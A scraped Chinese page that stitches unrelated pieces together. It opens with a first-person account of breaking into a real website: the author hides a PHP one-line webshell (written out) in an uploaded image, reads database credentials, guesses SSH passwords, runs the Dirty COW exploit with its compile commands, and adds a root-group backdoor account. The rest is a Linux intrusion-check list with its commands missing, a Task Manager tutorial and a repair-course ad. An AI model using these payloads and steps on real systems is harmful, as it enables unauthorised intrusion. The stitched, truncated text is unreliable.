注：本人是个菜鸟。
一、利用文件上传漏洞获取webshell。
确定要攻击的目标网站。
图上的目标站域名过期了，只能通过ip地址访问。
大概在去年的时候，对目标站实施了入侵，具体如下：
本想着通过sql注入的方式方式爆出用户密码，通过sqlmap扫描注入发现没有注入点，但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。而且有个默认的头像。通过右键查看图片得到当前图片路径。
这回知道了路径。那么就开始吧。
通过浏览目标站，得到目标站使用php语言。先准备一个php一句话木马 <?php @eval($_POST[pp]);?>。直接上传。那肯定是不成功的，校验了后缀格式。那么把 .php一句话木马后缀改为.jpg。在上传，使用brupsuite 抓包 再更改后缀为php，还是失败。既然普通的php码不能上传，那么就制作一个图片一句话木马。在图片里面植入一句话木马。
直接上传制作好的图片木马。提示上传成功。右键查看我们上的木马图片。发现名称已经被替换成14828287266_3_image.jgp 这个。直接复制图片地址，使用中国菜刀进行连接木马，连接失败，不知道啥原因。百度搜索发现 IIS6.0有文件上传解析漏洞 如：1.php;2.jpg，是图片，但是在IIS6.0里解析的时候，是忽略掉分号后面的字串，直接解析为1.php，抓包再使用00截断上传，还是无果。正要放弃的时候，想到一个方法，将一个普通的图片直接右键编辑，在最底下加入php一句话木马，上传成功，使用中国菜连接居然连接上了。
在通过访问这些目录找到目标站的数据库配置信息。
获取目标站的数据库。连上数据库简单的看了下mysql版本为5.7.11。
本来还想着利用mysql的system命令执行shell。结果这个版本没有这个命令
mysql> system ls;
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'system ls' at line 1
那么直接利用菜刀，上传一个php大马，来反弹一个shell。
访问php大马。
可以查看到当前服务器的版本信息。及所有用户。
那么剩下了就是怎样提权了，当时对linux提权不是很熟，所有暂时先放下了。
今年偶然也去目标站看看清况，看看我上传的大马有没有被管理员删除，直接访问网站，发现域名过期了，无法访问，再百度搜索该网站也搜不到，突然发现一篇帖子发现该网站管理员挺坏的啊。
那么通过ping ip 看到服务器没有关闭。直接把域名换成ip访问大马，访问成功，看来管理员已经放弃了这个服务器。既然这个网站管理员这么坏，当然要搞他一波。
二、liunx提权
利用php大马看一下服务器版本为 linux 2.6.32-573.22.1 当前用户为 apache
先上传一个 nc 来反弹当前shell  结果执行报错。
既然nc用不了。那么直接用ssh 直连。简单猜测一下 root 密码。
结果ssh一直连不上。通过端口扫描器，就只扫描到了80端口。
我严重怀疑这个管理员修改了22端口。百度怎么修改22端口  发现在这个文件保存着端口信息 /etc/ssh/sshd_config 打开看看，发现管理员修改了端口为2222
得到端口使用xshell工具用root账号简单的猜测了一下密码，无果。那么就试试普通用户。
发现一个用户名跟目标站的域名一样。果断通过这个用户名 进行ssh连接，简单的使用了几个密码尝试了一下后，就输入用户名当作密码，竟然连上了。那么接下来就利用这个普通用户进行提权。百度一波linux提权，看到gcc编译漏洞普通用户提权为root比较简单，就按照这个方式进行提权
执行到最后一行命令的时候。LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3。就直接断开连接了。尝试几次之后果断放弃。
在百度了一波后发现脏牛linux 漏洞对于2.6.22以上版本都有影响。刚好目标站版本为2.6.23。符合提权环境。脏牛Linux本地提权漏洞复现(CVE-2016-5195)​www.jianshu.com
那么下载exp文件，上传到目标站的tmp目录(这里我用的是这个exp  也就是dirty.c文件)执行按照命令依次运行
1、 gcc -pthread dirty.c -o dirty -lcrypt
2、  ./dirty 密码  (这里的密码自己定义)
大概等个几分钟。看到这段就说明成功了。这里firefart就是root权限的用户。密码就是刚刚运行的 ./dirty 密码  (自己输的密码)
果断切换用户 su firefart 执行id查看当前权限。已经是root权限了。提权成功！
接下来肯定是创建一个用户并赋予root权限啦
useradd ceshi
passwd ceshi
usermod -g root ceshi
成功执行！
《中华人民共和国刑法》
第二百八十五条
【非法侵入计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。
【非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。
【提供侵入、非法控制计算机信息系统程序、工具罪】提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。
第二百八十六条
【破坏计算机信息系统罪】违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。 违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。 故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。
结尾：不要干坏事哦！

随着开源产品的越来越盛行，作为一个
Linux
运维工程师，能够清晰地鉴别
异常机器是否已经被入侵了显得至关重要，个人结合自己的工作经历，
整理了几种常见的
机器被黑情况供参考。
背景信息：以下情况是在
CentOS 6.9
的系统中查看的，其它
Linux
发行版类似。
1.
入侵者可能会删除机器的日志信息，可以查看日志信息是否还存在或者是否被清空，相
关命令示例：
2.
入侵者可能创建一个新的存放用户名及密码文件，可以查看
/etc/passwd
及
/etc/shadow
文
件，相关命令示例：
3.
入侵者可能修改用户名及密码文件，可以查看
/etc/passwd
及
/etc/shadow
文件内容进行鉴
别，相关命令示例：
4.
查
看
机
器
最
近
成
功
登
陆
的
事
件
和
最
后
一
次
不
成
功
的
登
陆
事
件
，
对
应
日
志
“
/var/log/lastlog
”
，相关命令示例：
5.
查看机器当前登录的全部用户，对应日志文件“
/var/run/utmp
”
，相关命令示例：
6.
查看机器创建以来登陆过的用户，对应日志文件“
/var/log/wtmp
”
，相关命令示例：
7.
查看机器所有用户的连接时间(小时)
，对应日志文件“
/var/log/wtmp
”
，相关命令示例：
8.
如果发现机器产生了异常流量，
可以使用命令
“
tcpdump
”
抓取网络包查看流量情况或者
使用工具”
iperf
”查看流量情况。
9.
可以查看
/var/log/secure
日志文件，尝试发现入侵者的信息，相关命令示例：

伙伴们我们每天都在用电脑，电脑和手机已经离不开了，可以说手机和电脑就是我们的左膀右臂。我们用电脑的时候，如果电脑卡了或者反应慢了，我们都会想到吧任务管理器调出来看看，可以说调出任务管理器就像医生看病一样，方便我们查看电脑哪里出了问题，出了什么问题，该怎么解决问题。
调出任务管理器有几种方式。1.是按ctrl+atl+del 2 是ctrl+shift+esc 3.是在电脑任务栏右键选择任务管理器 4.是在运行里面输入taskmgr.exe 常见这4中打开任务管理器方式。
下面我们来了解任务管理器吧。
1.第一页应用程序
红色指示的是表示我们正在运行的有窗口我们可以看到的程序。这些我们任务可以很方便的结束他们。也就是关闭他们。
如果你开了多个窗口就可以看到多条应用程序，显示他们正在运行中 。
2.第二页是进程，可以勾选显示所有用户的进程，你会看到很多进程，有我们打开的也有相同自身打开的，在这个页面可以看到进程占用内存的大小和消耗的处理器，如果想看看谁多占用了内存 ，一目了然。找到占用内存大户，结束进程。结束进程的时间要看看是不是系统自身的进程，我们不太懂的话不要结束系统的进程，可能会蓝屏重启的哦。有一些是安全软件的进程，那些是结束不掉的，他们为了保护电脑，不让在这里结束进程。我们可以手动找到安全软件退出就行了。
3.第三页是服务。这个页面可以看到系统里面的所有服务，查看他们的状态。系统服务是比较专业的，等伙伴们有更多的知识之后也是可以随便操作的。
4.第四个页面就是性能页面了。这里可以青春的看到你电脑的内存是多大，你的电脑是几核的你的内存还剩下多少。还能看到更多的信息，比如有多少句柄，有多少活动线程，等等。对我们的电脑性能了然于心。当然了你们也会看到，我的这个笔记本是性能不怎么好的，才2个核心。
5.第五页面是联网。这里可以看到我们有几个网络适配器，我们的内网网络是10M的，还是100M的，或者是1G的。
6.这个页面可能有人认为没啥用。但是我要说的是，这个页面很有用的。任务管理器是win系统的标配，在win 服务器系统上比如 server2012 server 2008上，我们可以看到有没有别人进入我们的电脑。如果有两个人登录了我们的服务器，在这个页面就会出现两个。当然在win7上不大可能会有两个人登录我们的电脑。
如果真有人入侵了我们的服务器那就选择那个用户，果断的选择断开它。然后查找那个用户，更改密码，杀毒和打补丁。配置严格的防火墙让他有来无回。
好了。写了那么多，伙伴们对任务管理器应该有个深刻的了解了吧。多研究研究，你会有更多的收获，不久你也会是电脑高手的。

8年大神零基础电脑故障维修教程，60集视频+图解，新手送给你
电脑硬盘故障维修技巧视频
随着电脑的普及，不管是大学生还是上班族的电脑也陆续出现了许多故障问题，对学习与生活造成一定程度上的困扰，经过调查和了解，我们发现很多朋友在使用电脑过程中会遇到启动慢、蓝屏、死机、中病毒等各种情况，而这些问题如果报给厂家或经营者维修又会耽误大家的学习生活时间，如果去维修处维修又会因费用过高增加经济负担等等。
电脑维修
在使用电脑的过程中，难免会遇到许多的突发故障，这些故障的起因可能是软件原因造成的，也可能是硬件故障引发的，或是其它的因素……那么，我们这些初级的电脑用户们又该如何应对这些突发电脑故障事件呢没有人能保证自己的电脑一直不出现故障，电脑和电脑故障就像人和人的影子，你不知道什么时候它就会一下子出现在你的眼前：“昨天晚上还好好的，今天突然就开不了机了。”第一花费不少，第二耽误时间。如果你了解这些故障的原因，不仅可以自己维修电脑，还能让电脑的使用寿命更长。电脑在运行过程中经常会因为Windows系统或软件故障而死机或运行不稳定，严重地影响了工作效率，本章主要介绍电脑系统故障的基本处理方法。电脑故障的分类根据电脑的组成，可以将电脑故障分为硬件故障和软件故障两大类。
电脑维修
电脑故障是指电脑硬件完好，由于电脑的系统配置不当、电脑病毒入侵或操作人员对软件使用不当等因素引起的电脑不能正常工作的故障。对于电脑操作人员来说，电脑因故障停机是经常遇到的事情，其原因除少数是硬件质量问题外，绝大多数是由于软件故障造成的。软件故障大致分为软件兼容故障、系统配置故障、病毒故障、操作故障等。
电脑维修
有些朋友，系统重装了八九十几次了，自己还是不会装，不是找别人帮忙就是去维修店，这种人可能是真的对电脑不感兴趣或者不入门或者不用心去学，当然，你如果感兴趣的话肯定就会自己用心去学了，所以，归根到底还是兴趣的问题，你有兴趣了，自然可以钻进去，自学就会很简单。所以，最重要的是兴趣，其次，你要有一台电脑，不要把电脑当成宝，该实践的时候还是要实践一下，拆开再装上，会装机了不？最后，一定要积累，学习，不要怕电脑出问题，出了问题解决了，你的水平就会上升一步。
电脑维修
掌握一些电脑维修的基本检测方法,是解决电脑故障的必备基础知识,如果你懂得这些知识也许当你的机器出现问题的时候不必马上抱去维修站,自己就能解决,省事又方便，而且不怕被坑。